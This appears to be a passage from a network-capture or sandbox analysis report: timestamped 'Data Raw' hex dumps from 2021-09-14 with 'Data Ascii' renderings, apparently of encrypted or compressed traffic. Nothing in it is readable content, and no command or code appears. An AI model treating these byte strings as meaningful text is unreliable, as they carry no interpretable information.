                                                                        2021-09-14 16:41:17 UTC104INData Raw: 04 65 f2 79 42 c5 4c a4 0b ab e9 42 d9 5d 8a 6e e8 89 8c 50 c4 c2 64 7e cc d9 76 2a 75 50 15 58 69 9b c6 7e 9a 40 5e b6 ea 0c 39 bf db 28 c8 14 12 5b 24 89 79 11 ca 6b 30 ac 6a 19 13 a0 e4 e1 ef 26 a9 bf a1 99 6d be 3c 07 16 96 85 31 1f af 13 39 09 6d 6c 51 76 42 0b fe 80 56 c4 12 84 f0 2a 5c 22 59 07 1f af 82 c3 08 46 3a 9c 8b eb 4c 6a c0 79 51 84 fd 6c 8d 27 7b 56 f4 99 ce 50 59 88 06 12 f3 35 df ee 1b e2 72 ec a0 7f 5f 27 e1 eb bb ec a5 9a 62 0a 2a 06 f6 6a 22 3d ca 1f 37 b5 a0 a7 52 0e d4 82 74 ca 61 fa ca 5c 8a 46 71 cb 87 4a d7 12 09 f7 30 2b 70 b0 b7 07 d0 4d 6a 1e 2d a7 7f da 23 ee d7 2b a3 72 85 3e 30 0c 64 7e c5 44 e3 b5 13 c1 f5 c6 81 5f 99 34 da b2 92 56 01 e5 5a 3f 9d d4 0d e6 a9 91 52 21 b8 65 2d a5 f2 94 92 d0 ad 7f fe f9 30 7a 8c 13 d1 cb
                                                                        Data Ascii: eyBLB]nPd~v*uPXi~@^9([$yk0j&m<19mlQvBV*\"YF:LjyQl'{VPY5r_'b*j"=7Rta\FqJ0+pMj-#+r>0d~D_4VZ?R!e-0z
                                                                        2021-09-14 16:41:17 UTC106INData Raw: ea d2 8e 4e 02 b0 0b 2b dc f8 7c 34 ca 54 be 3b 96 88 3e 34 e3 1c 49 86 6f 4d 51 6f bf 04 1a b3 e4 2b 43 1a 4e 9a 32 a0 22 e4 33 44 3e dd 8e d1 1c 31 73 dc b4 1a b2 25 a7 b3 5f 01 da 62 10 ca 8b 7f 0e 57 a0 4f f1 ec f0 25 bc 5c 55 5c aa 10 10 17 ca fb 30 95 33 97 23 bc 4a a2 f0 1f e2 dc b1 88 70 1a 58 a1 50 02 c5 f8 b2 41 29 e6 bf 08 6f 4b 58 7d d1 95 da 7c f0 37 ba 45 35 bc 8c 14 f7 00 a4 e0 7e 12 2a 3b a0 5d b6 a8 0f 70 fc 25 65 b1 26 0d 0c 43 07 b9 4c 43 7c 7d ef 1e f2 7a 08 7f 63 00 cb df d6 ad ed 94 75 2b ca c3 23 b0 6b f8 dc 15 ba 61 0e a8 8e ed 2e 16 df 9a b0 6e 5e 18 36 79 31 de 65 38 69 81 1c fc bb 79 07 6c 22 27 53 ed 0d a5 4e bf d2 bf 4b ac 4e 9a 2a eb 8f ca 7c 18 95 37 ae 9c 35 bf 35 1a 7d 69 61 56 40 70 43 67 8f fc 0b 41 96 87 bf d1 63 39 93
                                                                        Data Ascii: N+|4T;>4IoMQo+CN2"3D>1s%_bWO%\U\03#JpXPA)oKX}|7E5~*;]p%e&CLC|}zcu+#ka.n^6y1e8iyl"'SNKN*|755}iaV@pCgAc9
                                                                        2021-09-14 16:41:17 UTC107INData Raw: 38 42 87 6b 2f 61 36 77 6c e0 43 d2 7a 72 d5 e8 99 b7 d6 b6 ee f2 74 2b e8 12 ce 37 a5 a2 3c e9 3c b3 49 0f cc c0 23 5e 3b 08 19 c8 de b6 02 ab 6d e4 8d 3e ce 4e b3 1c 89 e9 40 e1 46 ae 59 e8 a5 8e 9c c1 fa b5 94 20 22 64 91 74 50 06 68 7b 9f a5 73 64 41 92 a2 e3 35 cb b0 f0 35 a7 8e 05 a5 2f 9f dc 08 c1 6b 28 b4 87 1c 3f b3 f7 f2 11 20 9d 59 88 6b 6d 95 38 04 a1 98 84 13 a0 f6 30 33 65 3d 33 53 76 48 00 e7 93 12 9f 2b 11 ef 24 a8 9a 7a 16 35 74 a8 c2 02 59 40 99 11 e4 4d 48 7e 74 42 8a e2 76 eb 54 e5 58 d9 a0 6e 4a 4e 9e 6a 70 93 5f b5 9c 32 cb d1 ea ba 66 44 32 92 85 c0 1d a5 9e ee 0a 51 24 d7 d6 21 15 91 c4 28 a6 ea 2f 36 b6 f8 b9 f4 cf 61 de e3 78 8a a5 7b a4 0e 5c c4 10 5e bb 30 2b 7a 96 ba 1c c3 b3 7a 36 33 41 6d fe 33 fd a4 19 5c 73 ad 34 5c 40 75
                                                                        Data Ascii: 8Bk/a6wlCzrt+7<<I#^;m>N@FY "dtPh{sdA55/k(? Ykm803e=3SvH+$z5tY@MH~tBvTXnJNjp_2fD2Q$!(/6ax{\^0+zz63Am3\s4\@u
                                                                        2021-09-14 16:41:17 UTC108INData Raw: 36 30 59 4c 8e b7 15 75 8e 28 1a 50 34 a2 80 98 c8 96 b1 51 0f af 17 76 2a 6d 80 43 62 c4 50 78 49 80 0e 96 4c f8 12 e1 b3 23 24 7c 1a 32 35 c8 fe b5 49 08 b8 0d 11 dc f8 7c 03 f7 47 b6 31 aa 8c 23 5a 3a 1c 65 8e 56 7b 46 2f 26 dc e7 37 dc 3c 50 16 66 7e 3e bf 36 32 16 68 32 d0 b9 ea 5c 4f 87 0e 2c 76 13 34 af b9 45 0b aa 8b ef cb a1 67 0c 5c aa 2b da 3b d8 1a 95 a9 5b 21 b7 39 34 13 d5 ff 4c 2e 31 86 21 7d 12 79 d9 04 fb d9 b8 8d 68 2e 78 8d 6b 05 c7 89 bd e8 2b e2 9d 80 49 4a 5e 51 ea 8f c9 7e 9f 95 b0 5a 2f 9c 81 10 ce 05 df f7 57 2a 2e 2e c4 b0 14 9f 26 63 f4 2f aa b3 3e 37 f4 45 44 e3 5d 46 69 b9 ad 77 2b 84 f7 64 5c e6 c7 df c1 8d d6 83 8b 20 ce eb 26 b3 69 de 1c c3 92 5a 0d d3 a3 c4 86 10 f7 65 c9 4f 59 30 16 66 29 c7 7a 10 ba 88 00 04 a9 51 1b 6b
                                                                        Data Ascii: 60YLu(P4Qv*mCbPxIL#$|25I|G1#Z:eV{F/&7<Pf~>62h2\O,v4Eg\+;[!94L.1!}yh.xk+IJ^Q~Z/W*..&c/>7ED]Fiw+d\ &iZeOY0f)zQk
                                                                        2021-09-14 16:41:17 UTC109INData Raw: fb bf 33 a7 fc 50 4a 95 f6 41 10 9d 57 35 a9 f0 36 3e 5e fa c8 9f 6e 61 52 2b 34 e4 54 41 c3 df ef a7 81 b0 c4 90 83 4a e1 83 ed 96 ec 99 92 24 47 70 75 63 69 30 75 e2 50 4c fa f6 75 d7 c3 9a 8f 32 a5 9c f9 72 3d 83 9f b6 35 87 a4 3b f8 3f 3f e1 13 50 e7 3f d2 0e 20 f8 cd d2 af 3a 13 72 eb d8 95 65 70 b3 18 a2 ef 49 b2 ce 91 90 e9 a4 86 53 f2 fb a4 88 1b 91 5e 2a 7f 5b 2e d0 68 9b b0 6d 90 68 e5 b7 ea 17 2c db 68 33 c8 19 16 ae 3b b4 70 87 76 bd 20 60 83 ce b2 89 f3 ea ee 32 bc 50 a7 a3 7e 98 28 32 dd 8c 85 19 8a bc 18 25 74 43 72 40 7d cc bc d6 95 17 9f 30 04 fd a4 e1 17 69 06 37 0e 93 cf 3a 0b 59 f6 eb e3 5c 4e 77 53 fc 8e e2 6d d6 ec 1b 59 f5 a0 66 46 71 83 1c 02 97 44 32 e6 1a ca d0 fd af 64 4f 24 92 8c 79 f2 ab a5 d0 84 15 0c d6 d7 87 2c c5 dd 39 a1
                                                                        Data Ascii: 3PJAW56>^naR+4TAJ$Gpuci0uPLu2r=5;??P? :repIS^*[.hmh,h3;pv `2P~(2%tCr@}0i7:Y\NwSmYfFqD2dO$y,9
                                                                        2021-09-14 16:41:17 UTC111INData Raw: e2 30 44 13 1d c6 6d e8 15 74 17 b1 97 97 c6 9c fa cc 73 92 53 7f dd 83 ce a7 be 00 47 01 63 ad a7 bd bf 5b e5 14 79 3b 7c 60 f3 4b 36 bb 5d 3c 3a 7a 58 a6 ba 51 69 88 3f 97 57 34 a2 81 8b ce 87 44 46 27 a1 e1 77 2c cf 81 45 76 d0 5e 50 ea 81 15 ac 61 e9 96 e0 b9 28 c9 08 71 23 1d 3d 95 74 4f 02 b0 65 31 f6 c8 69 2c b7 85 b6 3b 8d a8 30 21 1d 17 76 8e 76 5a 42 3b 04 f5 e0 4c fd 2b dd 15 4e 8b 3b ab 24 0e 1a cb 32 da 9b f3 c7 4f 8d 29 63 99 a1 36 a5 bf 5f 0e aa a8 ee cb ad 46 cc 8a be 41 fa 4f e3 1e bd 5d 73 2d a0 16 65 28 d5 f5 22 f2 64 86 2b a9 8f 54 fb ed ee fc 9a b7 6f 06 84 9a 6e 2b d5 f7 9a ef 21 ce 8d 75 4d 40 86 79 c8 a5 c9 74 f1 3a b2 5a 27 42 b2 38 b3 8c df eb 7f 12 2e 2e ce 6e 14 b7 bd c0 f4 30 6e b9 39 1a e1 72 2f b4 53 47 63 65 5f 0c 0c 94 e1
                                                                        Data Ascii: 0DmtsSGc[y;|`K6]<:zXQi?W4DF'w,Ev^Pa(q#=tOe1i,;0!vvZB;L+N;$2O)c6_FAO]s-e("d+Ton+!uM@yt:Z'B8..n0n9r/SGce_
                                                                        2021-09-14 16:41:17 UTC112INData Raw: 0b 19 3a d9 49 be 4f c2 20 5d f1 e9 61 39 09 9f 2f ae 73 19 b9 3b 8d cb e6 17 c2 20 23 b1 73 63 71 48 75 52 78 7f 94 8d 59 e0 75 83 eb ce df e2 81 2d 3b ed 6b 4b ac 58 cf a7 80 ab 37 ab f5 aa 2a f8 eb c7 89 e5 40 52 27 ae f1 94 7b 2a de f4 85 9d a1 cc 42 7d 6d ef 92 ee f3 f2 8e 44 a5 4b 69 42 ea 62 21 76 64 f6 53 f4 ad 4d d9 d2 97 84 e3 a5 9c 66 c2 19 e6 30 bc 24 85 6d ea fa 3d 9a 43 04 ed 6a 2f 46 e7 ba e7 dc f6 59 2b 15 67 ec 96 4b 31 99 a0 13 8b b2 52 d1 48 ac 96 86 6f 8c 7b cb eb aa 93 38 37 52 f0 63 3f f2 69 6a 9d d5 6c 9b 40 b4 a5 e7 1f 29 db 3a 31 c8 19 14 aa 34 ab 6a 06 1b 7d 58 4e 95 18 39 8a e4 eb ef 2b a2 51 b1 b8 00 ff 3c 2c ff f6 4d 19 80 a7 05 02 7d 4c 17 66 77 42 0f ec 93 07 92 2b 05 d8 e7 54 9b 5c 17 24 60 4e c1 02 57 49 fa f3 32 5e 4e 70
                                                                        Data Ascii: :IO ]a9/s; #scqHuRxYu-;kKX7*@R'{*B}mDKiBb!vdSMf0$m=Cj/FY+gK1RHo{87Rc?ijl@):14j}XN9+Q<,M}LfwB+T\$`NWI2^Np
                                                                        2021-09-14 16:41:17 UTC113INData Raw: 26 29 39 41 dc 38 c8 60 cc 6a e1 5e 5a 08 c2 61 22 11 3b 34 1d 04 05 72 63 6a c3 69 42 6a 58 8c 39 36 da dc a8 45 71 f1 b7 e1 1c fe fa 04 ad 1e 31 44 15 72 17 fa 7d 1f 76 d7 de 45 94 dd a6 9d 36 c8 92 55 a9 3f 9c 8d a5 9d 0c 53 0a 7a b5 71 7e 91 52 d7 63 6a 3b 7c 75 f3 26 ae bb 4c 3d 29 7d b2 8f 9b 59 78 8b 37 2a 3f cd a3 80 9e d7 99 51 5b 0f be ef 68 0b 93 91 6f 6f c7 c4 cf 40 99 c3 7c 5a fc 89 c2 a0 28 ce 6d 11 3c 35 c2 fb 99 43 13 b0 6c 76 a9 06 87 d4 c7 6e a5 30 87 91 2a 38 e3 1c 49 86 68 48 c8 98 3b 20 f6 45 f6 27 43 19 4e 9a 31 a5 ce 1b 1e 60 0a 7e 90 db 5c 54 9e 28 4b 14 aa 21 51 b2 62 0a dd 7c e5 cb b6 60 14 45 56 51 d1 29 db 17 aa 8a ce 36 6b 06 c6 9e fe f5 23 9c 3f 99 39 b0 58 5c e0 38 e4 ed 4c 81 43 20 87 9e bd 04 aa 0e 9b e9 2d e1 da 89 4c 4a
                                                                        Data Ascii: &)9A8`j^Za";4rcjiBjX96Eq1Dr}vE6U?Szq~Rcj;|u&L=)}Yx7*?Q[hoo@|Z(m<5Clvn0*8IhH; E'CN1`~\T(K!Qb|`EVQ)6k#?9X\8LC -LJ
                                                                        2021-09-14 16:41:17 UTC114INData Raw: 18 0e 8e 63 ac ea 1a db da f1 8b 8b 41 1e 93 90 dc e0 ad a5 10 99 45 f7 d7 d6 23 22 e6 d6 23 ac d3 c6 2d bb 00 90 68 c6 12 d4 c9 5c 8c b6 74 d4 98 4f cf 1a 20 e2 2e 01 8e b1 8a 03 d6 b4 71 5d d7 be 6c d4 3c d4 cc 3a 5d 62 a2 2d 1a ed 75 36 d1 28 bc 33 19 dc f5 c9 9e 64 82 22 24 a2 b5 45 1b 04 44 4c 83 26 b1 ea b5 9c 4a 29 a9 7f 3a a9 07 6b bf f1 a5 d9 30 f0 28 a6 45 05 ca d8 a1 91 80 33 15 4a 83 a2 b1 f6 8d 6f c5 5d 23 e0 ca 9e 71 b1 ff bf 40 32 15 d6 4b ef 6e 3f 79 36 61 e1 5e 5a 94 0b 26 bf ad 05 47 eb e4 cd 93 5f 55 c3 1a 53 63 47 c8 d4 3f e9 c2 b2 59 a7 e7 d3 02 08 00 fd 2f cb ea be f3 00 19 d9 ee 6e 1e 61 1c ba 88 8b 23 ad de dc d8 94 50 76 25 55 5f d9 6d 0d 42 07 7a a7 9c 74 bd 4a e4 2a 96 3a 50 69 e9 26 ae bb 4c 3d 29 36 b2 8f 9b 56 42 8b 10 67 a9
                                                                        Data Ascii: cAE#"#-h\tO .q]l<:]b-u6(3d"$EDL&J):k0(E3Jo]#q@2Kn?y6a^Z&G_UScG?Y/na#Pv%U_mBztJ*:Pi&L=)6VBg
                                                                        2021-09-14 16:41:17 UTC115INData Raw: 04 df f7 76 10 55 6d cf 6e 10 61 13 5b 30 25 74 b9 3b 60 b7 43 2b b0 4b 4e 6a 74 ab 24 39 84 f7 6a 76 02 c7 a2 81 a4 f2 87 89 28 9d 99 27 b3 67 9a 97 c2 92 5e 07 82 9b ce 95 11 df 81 c8 51 a1 19 1e 74 2b cf 16 7e 79 89 04 01 6c 28 4c 6e 2a 3b 9a cc 95 a2 4e a4 dd b5 a6 a5 62 88 3a e7 83 34 6c 31 83 ca a7 af 3a 7f 10 8b 6c 6c 6b 4a 5a 65 59 91 8e c1 05 5e 42 99 99 c1 7e 2a 8a 4a 91 5b b4 1e 7f ff fc 22 2b 68 a3 d4 eb 6a da 2d 0e 17 7b 03 23 1b 12 02 16 d9 0a be 3a 8a 05 50 54 fa af e0 d1 61 7c 90 ba 37 f8 25 2b 50 b2 10 44 7c b4 7d 65 53 c5 49 1a 67 bc 97 2d 3c 3d 53 35 84 39 79 be d8 08 21 c4 8e 63 a9 d4 63 ab db ec 5f 84 e0 61 d0 ad 58 71 4c c5 74 1c c0 3f d1 16 4e c9 40 63 7b ea 6d 58 6f b8 91 8c 63 c1 64 95 c2 f2 cf c7 a0 26 38 6c 45 5d bd 4a 58 1b 97
                                                                        Data Ascii: vUmna[0%t;`C+KNjt$9jv('g^Qt+~yl(Ln*;Nb:4l1:llkJZeY^B~*J["+hj-{#:PTa|7%+PD|}eSIg-<=S59y!cc_aXqLt?N@c{mXocd&8lE]JX
                                                                        2021-09-14 16:41:17 UTC116INData Raw: 68 59 92 50 5a 41 13 ed 8d 16 8e 37 0a fd d4 57 b7 5c 17 32 18 56 d0 07 42 56 e5 e6 e4 5c 4f 7e 62 af 8f ce 77 ed 36 5f 58 f5 b5 79 12 7d 83 19 02 8e 45 ac ec 1a db dc f1 a9 8b 41 1e b2 83 a0 ab a5 b2 c2 00 5e 1e d6 d6 3e 2b c2 d1 00 2d c0 cd 34 a0 73 96 44 cd 60 c0 df 48 a2 06 71 cb 9c 74 9e 1a 31 e3 5e f7 72 b0 ac 03 d8 b9 78 3f 2e ae 61 cd 28 01 de 1d 5b 58 f5 2d 3f 00 79 1a cb 56 a3 3d e7 db ca f9 87 5f 94 2f 35 b6 2f d6 29 fa 45 61 8d 1a 04 f2 af 8f 40 3a bf 65 22 ac e8 6f 1f c3 a6 57 86 5b 21 77 8b 3e 7c c7 b5 88 a3 de 05 41 96 b2 92 f5 a1 69 48 4a 32 9c 3e 9f 60 ba ff 9c ad 38 39 c1 54 da 32 da 6b 17 69 f9 44 93 97 ea 63 80 ac 14 53 f1 f1 cb c6 41 76 db 64 53 70 4a d6 39 36 da ed a3 29 ee f7 d8 19 93 49 e6 d5 d5 38 27 92 9e 36 c6 f8 7c 18 78 1e bc
                                                                        Data Ascii: hYPZA7W\2VBV\O~bw6_Xy}EA^>+-4sD`Hqt1^rx?.a([X-?yV=_/5/)Ea@:e"oW[!w>|AiHJ2>`89T2kiDcSAvdSpJ96)I8'6|x
                                                                        2021-09-14 16:41:17 UTC118INData Raw: d5 f5 29 96 2a 95 2e a3 42 59 e6 cd fa f5 b1 98 7c 03 8e 98 6e 1c cc 0c 9b c5 20 ef a4 71 c3 fd 6a b5 d1 85 da 71 f0 37 b7 41 db 43 a1 3d d2 ee c3 ee 7a 12 3f 2b d7 90 15 9b 18 61 e7 21 6e aa 3c 1b e3 47 35 4a 5c 6a 6b 6c b8 da 01 9a fe 73 71 13 d2 da da 5b f3 af 9e 2d ce c2 23 b3 65 ef 5c e8 92 5a 0e c7 50 c7 86 1e f9 8e de 4a 5f 09 37 7c d7 cc 41 3d 6e 84 1b 11 bf 55 1b 6a 3c c1 84 e9 85 b0 5d b0 d8 b3 5d bb 44 75 23 d8 84 1f 78 0c ca cb 59 7c 38 06 cf 91 7f 63 41 5b 44 4a 55 6f b0 ed 03 56 95 86 93 c3 79 a4 2c 4c 05 12 63 25 b4 ea 51 e8 01 68 a7 d7 9b 2e dc 2f 84 7a 59 38 31 1e 18 10 05 c5 f6 31 a1 8e 8d f1 4d db b2 f3 de 66 67 4b b2 ec d1 3e 25 53 af c6 47 a0 11 6e 65 53 ce 9b 03 72 93 97 3d 29 2b ad 34 a8 3a 6e 80 f0 08 20 db 91 68 56 c6 7f ab f0 d1
                                                                        Data Ascii: )*.BY|n qjq7AC=z?+a!n<G5J\jklsq[-#e\ZPJ_7|A=nUj<]]Du#xY|8cA[DJUoVy,Lc%Qh./zY811MfgK>%SGneSr=)+4:n hV
                                                                        2021-09-14 16:41:17 UTC119INData Raw: 5d 8c 56 32 89 ea 1d 2e 16 e1 10 dc 07 11 8d 86 a5 7b 03 d5 43 f2 b9 94 1e 29 2f f4 ea ef 20 a5 55 b4 9d cc 95 3e 26 dd 88 84 19 8a be 1f 3a 71 66 a8 52 76 44 1c 73 87 16 9f 3b 06 d3 3b 75 8d 40 8a 08 0f 80 c2 a0 4c 7b e2 ff f0 65 e1 61 7b 5b 9a ca a3 ec 4d 1d 4e 78 b6 6c 52 58 91 3b 13 b3 49 a8 6d 25 ca d1 ef 02 64 62 26 97 95 f3 40 a4 b2 cc 1c 02 c9 d5 d6 23 2b 47 c2 28 ac c3 d9 26 a2 d6 32 44 cd 6b fc da 5c 8a af 62 c0 87 59 ec 41 30 e9 3b 03 5e b2 a6 09 a8 2b 6b 32 24 ae 60 a6 31 ff df 2a 4c 78 dd 20 33 13 6f 32 ce 59 bc 37 0a d7 f2 1e 00 4e 91 28 0c a7 be 5a 08 d2 59 63 85 0b 90 78 a8 8f 41 28 ab 57 34 99 ef 7b 9e d4 b7 57 87 f3 92 61 bc 01 b0 8b b4 82 8f 91 15 62 84 85 57 7b 9e 63 d4 54 9d 9e 10 8c 53 a6 c2 92 47 20 98 e8 40 f0 2c d2 5c 0b 4d fe 5e
                                                                        Data Ascii: ]V2.{C)/ U>&:qfRvDs;;u@L{ea{[MNxlRX;Im%db&@#+G(&2Dk\bYA0;^+k2$`1*Lx 3o2Y7N(ZYcxA(W4{WabW{cTSG @,\M^
                                                                        2021-09-14 16:41:17 UTC120INData Raw: 03 52 9f 12 37 33 1a 34 7e bf dd 91 db 5d 5b 99 37 63 a6 a1 36 a5 9b d2 09 c5 65 fd d1 b6 77 1f 7c 81 54 fd 3c ce 93 ba 5c 5f 20 a5 05 04 3b 76 f5 23 97 1b af 2e a3 55 4a d9 c2 fa d9 b8 ac 23 17 92 9d 43 8b c6 f2 9c ff a6 e1 b5 75 4c 5e 4c 6d e6 2c c9 74 fa 32 9a a7 21 42 8b 20 74 02 df fd 7e 01 0d 3f ed 78 3c e0 1c 63 f2 87 65 9a 2e 33 dc 40 2b b2 ff 57 40 71 bb 18 24 26 f7 60 7e 3b 5f df c7 af da 8c 89 2a e0 c9 3d a1 46 cf 3a c1 92 50 35 4e 7a 3a 79 ca d1 82 e8 b1 49 35 32 66 32 a2 3a 38 78 83 dc 71 4c 54 0a 69 39 2c 94 d6 97 bd 66 e2 da a2 5e 8c 60 89 22 f2 e9 4c 7d 34 90 1c a9 81 3f 6f 72 66 7e 69 6d 48 49 6b 46 00 73 ec 03 50 7e e9 41 d0 7b 20 f4 b3 8a a5 b3 24 01 2f 85 65 20 07 5b d7 90 2a cc 42 d8 cf 71 12 5f e2 13 13 15 d4 9b 6d 14 8d 09 29 9b cf
                                                                        Data Ascii: R734~][7c6ew|T<\_ ;v#.UJ#CuL^Lm,t2!B t~?x<ce.3@+W@q$&`~;_*=F:P5Nz:yI52f2:8xqLTi9,f^`"L}4?orf~imHIkFsP~A{ $/e [*Bq_m)
                                                                        2021-09-14 16:41:17 UTC122INData Raw: 39 ed 43 01 5f 31 20 e7 df cd a7 2a 04 7a fb 98 bd e8 63 90 09 ae 86 af d0 42 a8 86 86 77 8c 7b cb 95 58 83 33 20 44 45 a7 52 06 62 05 65 bb 7e 9c 53 b0 a9 ca 0e 38 b4 e1 24 d7 0f fb a4 09 b1 6a 18 bf 27 36 ba 90 09 2c 8a ef e8 ef 27 a2 4d bf a8 7c 82 3e 3d e2 86 a2 e7 81 81 1f 35 74 5e 03 49 77 42 01 e1 a7 05 88 3a 04 e7 32 a8 9a 7a 0f 44 b5 80 c3 08 57 41 e5 fc e4 5c 55 7b 85 50 a2 e8 19 7c 4d 1b 53 e6 b5 77 41 4e 82 08 15 8e 4e 41 e0 36 d8 c7 ff a9 1a 8c 33 83 8b cc 39 b7 a4 d5 02 35 1e c5 c1 25 2c dd da 36 52 c3 e1 1c a7 f3 fe b8 cc 61 d2 dd 33 58 a7 71 c1 f9 a0 c5 1a 37 fe 5e f9 72 b0 ac 60 3b b2 6b 34 39 d0 be d0 23 f5 b0 cf 5c 73 af 21 3c 0c 6b 09 cd 5b ad 26 06 d5 18 cf ad 41 80 2e 35 bb d1 df 03 fa 4f 73 8c 12 99 e6 b8 8f 50 3e a7 60 db bb d5 4b
                                                                        Data Ascii: 9C_1 *zcBw{X3 DERbe~S8$j'6,'M|>=5t^IwB:2zDWA\U{P|MSwANNA6395%,6Ra3Xq7^r`;k49#\s!<k[&A.5OsP>`K
                                                                        2021-09-14 16:41:17 UTC123INData Raw: af 49 a2 97 e0 b3 26 cf 7c 0b 21 17 3e ec da ae 03 ba 7c 29 82 cb 70 29 cf 28 be 3a 87 8a 2b 27 35 81 65 8a 74 63 20 2e 2c f0 e8 3f dd 3c 50 18 5d 8f 2b bb 24 32 1b 6c 32 dc 86 56 5b 4f 8d 22 58 03 b0 30 b9 b0 ec 18 c3 7b fa e3 6f 6a 0b 5e b9 54 e9 12 f2 1a bd 5a 48 ac b6 11 10 12 c6 f3 32 9b 25 91 a7 28 53 5c f0 91 ea df a6 94 47 ce 8f 89 61 12 c1 e6 b2 c2 2f e6 b3 62 c0 4d 58 79 cf 9c cf 65 f6 30 b6 f8 34 44 99 2c d1 cd de fd 75 03 2a 3a e6 42 10 b7 18 74 79 22 74 b9 38 08 f4 53 2d a2 4a ca ef 65 af 0d ae 94 f1 74 60 3b 0b de c7 af e3 87 9f 02 cb de 26 b5 75 6a d7 c3 92 5b 1b bc 90 ed 25 14 df 9a d9 67 e1 1b 32 60 30 40 6a 38 78 88 13 04 ab 53 1c 66 88 2e 83 d2 90 2b 71 b5 d8 a3 fa b5 48 93 2b 7a 31 b8 42 34 9a 35 04 92 39 7a 1a 80 78 7d 7f 42 d2 55 50
                                                                        Data Ascii: I&|!>|)p)(:+'5etc .,?<P]+$2l2V[O"X0{oj^TZH2%(S\Ga/bMXye04D,u*:Bty"t8S-Jet`;&uj[%g2`0@j8xSf.+qH+z1B459zx}BUP
                                                                        2021-09-14 16:41:17 UTC124INData Raw: b2 bf 19 aa 7e e4 81 9c 66 ff 99 96 17 b9 7b 6a 09 61 24 f2 db 9a dd 2d 7b 5a d5 c1 e0 1a 34 b4 91 c0 2d 29 ec 32 c9 b0 8c b5 38 c3 36 b1 45 25 e6 7b 60 5f 31 20 f1 cd de a1 3c 06 69 dc b2 42 e9 4f b3 09 a7 f6 5f 2f 43 82 9a e0 9c a5 7a c1 fa bb 8f 20 22 5c 3b 71 4b f8 69 46 8f b8 05 19 41 be b2 94 6f 2e b4 fa 1b b1 12 05 af 2e b9 68 0d c1 7a 33 a5 9d e6 3e 8e f9 e2 d6 85 b1 41 a0 aa 65 86 3a 2c e4 9d 9c e7 81 81 07 31 1e 31 6d 51 72 3c 79 ff 80 1c b7 43 14 f0 20 5c 82 45 02 37 1e 84 dc 08 a3 59 da e4 e6 36 c3 60 7b 55 a6 b5 65 ef 47 04 52 e6 b5 6c 43 5d 9d 14 fc 90 73 b0 e3 61 4f d0 ee a4 5d 17 30 83 8b c4 ed b7 b6 c6 19 2e 10 28 d7 09 3b cd e9 4e b1 d1 c9 32 a7 fa 8c ba cc 4d da c9 27 09 a4 71 cf be 0b c6 1a 3b f7 22 2f 70 a1 a2 16 39 b2 47 3b 28 86 37
                                                                        Data Ascii: ~f{ja$-{Z4-)286E%{`_1 <iBO_/Cz "\;qKiFAo..hz3>Ae:,11mQr<yC \E7Y6`{UeGRlC]saO]0.(;N2M'q;"/p9G;(7
                                                                        2021-09-14 16:41:17 UTC125INData Raw: 35 91 a5 69 3b 78 75 f0 af 80 96 52 10 29 7d 6c 14 b7 54 69 91 22 32 7d 36 a2 86 b2 a6 e8 db 51 0f ab fb 78 b0 48 bd 4c 44 db 45 58 ed 81 15 a6 56 ea be cd b1 23 c8 56 74 5d 84 3d fa b1 50 12 20 53 1b d2 de 67 3b f8 f1 b6 3b 87 9f 32 09 30 1f 65 8c 54 21 38 b6 2d fa e1 53 ea a7 75 3f 40 ad 25 ae 10 d3 32 68 32 c2 b9 f6 5e 4f 8b 09 21 7b 38 37 af b7 51 1b 5f 4a c3 c5 81 74 19 74 63 50 fd 3a c5 36 90 5e 5f 27 9b 7f 6e 8a d4 f5 27 82 20 1c 0e 8e 5c 7a ee 20 db 0b b2 80 6f 19 9f a1 46 01 c5 f4 b0 83 55 7f b4 75 49 55 4c e3 eb a2 c7 52 ef 32 92 b9 25 42 8d 25 d1 28 dd fd 79 38 40 50 57 6f 14 b3 01 76 6e 00 59 b6 1f 04 e7 62 c1 b4 5d 46 7c 6a 87 21 0e 85 f1 4a 1a 6d 5a de c7 a1 ed 95 11 0f cb d5 00 ac 75 c7 29 c3 92 5a 10 be ac e8 84 14 d9 ba a7 31 c6 19 32 62
                                                                        Data Ascii: 5i;xuR)}lTi"2}6QxHLDEXV#Vt]=P Sg;;20eT!8-Su?@%2h2^O!{87Q_JttcP:6^_'n' \z oFUuIULR2%B%(y8@PWovnYb]F|j!JmZu)Z12b
                                                                        2021-09-14 16:41:17 UTC127INData Raw: 5a 6f a9 90 af 65 e8 64 94 f0 66 b0 72 a8 24 3f f2 7e c7 98 7c 4f 36 88 4f 04 0b e4 a6 12 56 c3 ea 8b f4 4f 69 41 4a 77 85 53 c7 c0 cb 15 b0 9d ca bc b4 41 c0 30 e5 e2 fe 85 ba 12 56 79 6c 29 0d 5f e5 6d e7 5f 33 3b c4 f2 ee 94 ba 2a f4 b5 51 77 2b ec 27 a7 1d a0 b7 3c ef 1c df 28 8c e5 7b 27 41 70 ba dd e1 d1 96 35 54 4d 28 85 43 e9 50 b8 30 8e eb 53 d7 68 c0 ee 70 a4 8e 7f de b8 3e a7 1e 29 7a 35 37 70 d1 6a 6a 9b a5 71 b2 6d bc b6 ec 37 41 ca 69 32 c8 17 1a e6 bf 80 56 06 e7 74 74 9a 72 1a 3f a2 ec e6 c7 0c b3 41 a6 9f 05 eb a7 2d f5 9d 9b 5d 1a 88 3e 3d 43 51 28 71 84 40 0b fe 9b 3e b2 38 15 f6 00 3c e5 cf 07 37 0b 9f 86 98 78 75 f8 cd fb 08 62 96 79 51 8e f9 4f c2 4f 1b 5f df df 12 cb 58 82 1d 1d d7 c5 9a cc 15 ec ce a8 80 89 42 32 83 9e d7 cb 89 b0
                                                                        Data Ascii: Zoedfr$?~|O6OVOiAJwSA0Vyl)_m_3;*Qw+'<({'Ap5TM(CP0Shp>)z57pjjqm7Ai2Vttr?A-]>=CQ(q@>8<7xubyQOO_XB2
